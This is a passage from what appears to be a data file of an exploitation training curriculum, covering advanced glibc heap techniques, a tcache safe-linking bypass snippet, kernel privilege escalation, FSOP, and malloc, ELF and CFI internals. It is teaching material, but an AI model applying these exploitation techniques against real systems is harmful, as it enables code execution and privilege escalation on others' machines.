      { heading: "Sources", content: `- how2heap: github.com/shellphish/how2heap (heap exploitation reference)\n- glibc malloc source: sourceware.org/glibc\n- Erik Bosman, \"Framing Signals\" (SROP paper, 2014)\n- CTF Wiki: ctf-wiki.org`, sortOrder: 3 },
    ],
  },
  {
    competencyId: "binexp", depthTier: 4, title: "Expert Binary Exploitation", recommendedLevel: 4,
    sections: [
      { heading: "Advanced heap techniques", content: `Modern glibc exploits require understanding tcache and safe-linking:\n\n**Safe-linking (glibc 2.32+)**: Fastbin/tcache fd pointers are now mangled:\n\`\`\`\nstored_fd = (actual_fd >> 12) XOR chunk_address\n\`\`\`\nTo forge a fd pointer, you need to know or leak the chunk's address.\n\n**House of techniques** (named heap exploitation strategies):\n- **House of Force**: Overwrite top chunk size → malloc returns arbitrary address\n- **House of Spirit**: Forge a fake chunk → free it → malloc returns the fake chunk\n- **House of Lore**: Corrupt smallbin to return arbitrary address\n- **House of Orange**: Trigger malloc_printerr → FSOP (File Stream Oriented Programming)\n- **House of Einherjar**: Off-by-one null byte → backward consolidation → overlapping chunks\n\n\`\`\`python\n# Tcache safe-linking bypass\n# If we have a heap leak:\nheap_base = leaked_addr & ~0xfff\n\n# Mangle our target address\ntarget = libc.symbols[\"__free_hook\"]\nmangled = (target >> 12) ^ chunk_addr\n\n# Write mangled pointer as fd\nedit(0, p64(mangled))  # corrupt tcache fd\nmalloc()  # returns the freed chunk\nmalloc()  # returns __free_hook\n\`\`\``, sortOrder: 0 },
      { heading: "Kernel exploitation basics", content: `Linux kernel exploitation follows different rules:\n\n\`\`\`c\n// Kernel modules run in ring 0 with direct hardware access\n// Typical targets: ioctl handlers, filesystem drivers, netfilter\n\n// Common vulnerability classes:\n// - Stack buffer overflow (same concept, kernel stack)\n// - UAF in kernel objects (more complex due to SLAB allocator)\n// - Race conditions (TOCTOU in syscall handlers)\n// - Integer overflow in size calculations\n\n// Exploitation goal: privilege escalation\n// Classic: overwrite current process credentials\n// commit_creds(prepare_kernel_cred(0))  → become root\n\`\`\`\n\n\`\`\`bash\n# Kernel debugging setup\n# QEMU + gdb for safe kernel exploitation practice\nqemu-system-x86_64 -kernel bzImage -initrd initramfs.cpio \\\\\n  -append \"console=ttyS0 nokaslr\" -s -S -nographic\n\n# In another terminal:\ngdb vmlinux\ntarget remote :1234\n\`\`\`\n\nKernel mitigations: KASLR (kernel ASLR), SMEP (no user-page execution in kernel), SMAP (no user-page access in kernel), KPTI (page table isolation).`, sortOrder: 1 },
      { heading: "File Stream Oriented Programming (FSOP)", content: `FSOP abuses glibc's FILE structures (stdin, stdout, stderr):\n\n\`\`\`c\n// FILE struct has function pointers in its vtable\n// If we can corrupt a FILE struct:\n// - Overwrite vtable pointer to controlled memory\n// - Trigger a file operation (fclose, fflush, printf)\n// - Vtable function pointer is called → code execution\n\n// glibc 2.24+ added vtable verification\n// Bypass: use _IO_str_overflow or _IO_wstr_overflow\n// These are within the valid vtable range\n\`\`\`\n\nFSOP is often the final step in heap exploits where you can corrupt an arbitrary write primitive into code execution.`, sortOrder: 2 },
      { heading: "Sources", content: `- how2heap: github.com/shellphish/how2heap (comprehensive heap reference)\n- Linux Kernel Exploitation (by a]ccess): access.redhat.com/blogs\n- ptr-yudai's blog (modern glibc exploitation)\n- PAWNYABLE: pawnyable.cafe (kernel exploitation training)`, sortOrder: 3 },
    ],
  },
  {
    competencyId: "binexp", depthTier: 5, title: "Binary Exploitation Internals", recommendedLevel: 5,
    sections: [
      { heading: "glibc malloc internals", content: `Understanding malloc's data structures is essential for heap exploitation:\n\n\`\`\`\nChunk structure (in-use):\n+------------------+\n| prev_size (8B)   |  ← only if previous chunk is free\n+------------------+\n| size | flags (8B) |  ← flags: PREV_INUSE, IS_MMAPPED, NON_MAIN_ARENA\n+------------------+\n| user data        |  ← returned by malloc()\n+------------------+\n\nChunk structure (freed, in bins):\n+------------------+\n| prev_size (8B)   |\n+------------------+\n| size | flags (8B) |\n+------------------+\n| fd (8B)          |  ← forward pointer (next free chunk)\n+------------------+\n| bk (8B)          |  ← backward pointer (previous free chunk)\n+------------------+\n\nBin types:\n- tcache: per-thread, LIFO, 7 entries per size (no checks pre-2.32)\n- fastbin: single-linked LIFO, sizes 0x20-0x80\n- unsortedbin: doubly-linked, recently freed chunks (any size)\n- smallbin: doubly-linked, sorted by size (< 0x400)\n- largebin: doubly-linked, sorted by size (>= 0x400)\n\`\`\`\n\nKey operations:\n- **malloc**: Check tcache → fastbin → smallbin → unsortedbin → largebin → top chunk → mmap\n- **free**: Check if tcache has room → check if fastbin size → consolidate with neighbors → unsortedbin\n- **Consolidation**: Adjacent free chunks merge to reduce fragmentation`, sortOrder: 0 },
      { heading: "ELF binary internals", content: `\`\`\`\nELF layout:\n+------------------+\n| ELF Header       |  ← magic: 7f 45 4c 46, arch, entry point\n+------------------+\n| Program Headers  |  ← segments for loading (PT_LOAD, PT_INTERP)\n+------------------+\n| .text            |  ← executable code\n| .plt             |  ← procedure linkage table stubs\n| .got.plt         |  ← GOT entries for lazy binding\n| .rodata          |  ← read-only data (strings)\n| .data            |  ← initialized global variables\n| .bss             |  ← uninitialized globals (zero-filled)\n+------------------+\n| Section Headers  |  ← metadata for linker/debugger\n+------------------+\n\nLazy binding (how PLT/GOT works):\n1. First call to puts@plt:\n   - PLT stub jumps to GOT entry\n   - GOT initially points back to PLT (resolver stub)\n   - Dynamic linker resolves puts() address\n   - GOT entry updated with real address\n2. Subsequent calls:\n   - PLT stub jumps to GOT entry\n   - GOT now has real address → direct jump\n\nRELRO:\n- Partial: .got is read-only, .got.plt is writable (GOT overwrite possible)\n- Full: both .got and .got.plt are read-only after startup\n\`\`\`\n\n\`\`\`bash\nreadelf -h binary   # ELF header\nreadelf -l binary   # program headers (segments)\nreadelf -S binary   # section headers\nreadelf -r binary   # relocations (GOT entries)\nobjdump -R binary   # dynamic relocations\n\`\`\``, sortOrder: 1 },
      { heading: "Modern exploitation: CFI and shadow stacks", content: `Modern compilers and hardware add control-flow integrity:\n\n**Intel CET (Control-flow Enforcement Technology)**:\n- **Shadow Stack**: Hardware-backed second stack storing only return addresses. RET checks shadow stack — mismatch = fault. Defeats ROP.\n- **IBT (Indirect Branch Tracking)**: Indirect jumps must land on ENDBR64 instruction. Reduces available gadgets.\n\n**Software CFI (Clang CFI, MSVC CFG)**:\n- Validates indirect call targets against a bitmap of valid function addresses\n- Forward-edge protection (indirect calls/jumps)\n\n**Bypasses** (research-level):\n- CET shadow stack: No known generic bypass — requires corrupting shadow stack itself (ring 0)\n- Software CFI: Find gadgets that happen to start at valid call targets\n- JIT compilation regions are often exempt from CFI\n- Data-only attacks: Corrupt data (not control flow) to achieve the same effect\n\n**Data-Oriented Programming (DOP)**: Chain non-control-flow data corruptions to achieve Turing-complete computation without hijacking any code pointer. This is the frontier of exploitation research.`, sortOrder: 2 },
      { heading: "Sources", content: `- glibc malloc source: sourceware.org/git/?p=glibc.git (malloc/malloc.c)\n- ELF specification: man7.org/linux/man-pages/man5/elf.5.html\n- Intel CET specification (Intel SDM Volume 1, Chapter 18)\n- Hu et al., \"Data-Oriented Programming\" (IEEE S&P, 2016)\n- azeria-labs.com (ARM exploitation)\n- how2heap: github.com/shellphish/how2heap`, sortOrder: 3 },
    ],
  },
];
